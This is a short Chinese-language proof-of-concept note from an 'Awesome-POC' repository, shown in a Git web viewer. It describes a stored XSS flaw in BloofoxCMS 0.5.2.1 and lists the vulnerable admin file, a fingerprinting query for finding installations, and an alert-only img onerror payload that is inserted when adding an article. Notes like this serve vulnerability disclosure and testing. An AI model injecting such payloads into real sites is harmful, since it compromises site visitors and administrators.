Awesome-POC/CMS漏洞/BloofoxCMS 0.5.2.1 存储型XSS.md
2024-12-18 10:47:51 +08:00

35 lines
437 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# BloofoxCMS 0.5.2.1 存储型XSS
## 漏洞描述
参考链接:
- https://packetstormsecurity.com/files/161195
## 漏洞影响
```
BloofoxCMS 0.5.1.0 -.5.2.1
```
## 网络测绘
```
app="BloofoxCMS"
```
## 漏洞复现
漏洞文件:
```
/admin/include/inc_content_articles.php
```
登录有效的账号在添加文章的时候插入Payload发布每次访问均可触发
```
<img src=# onerror=alert('xss')>
```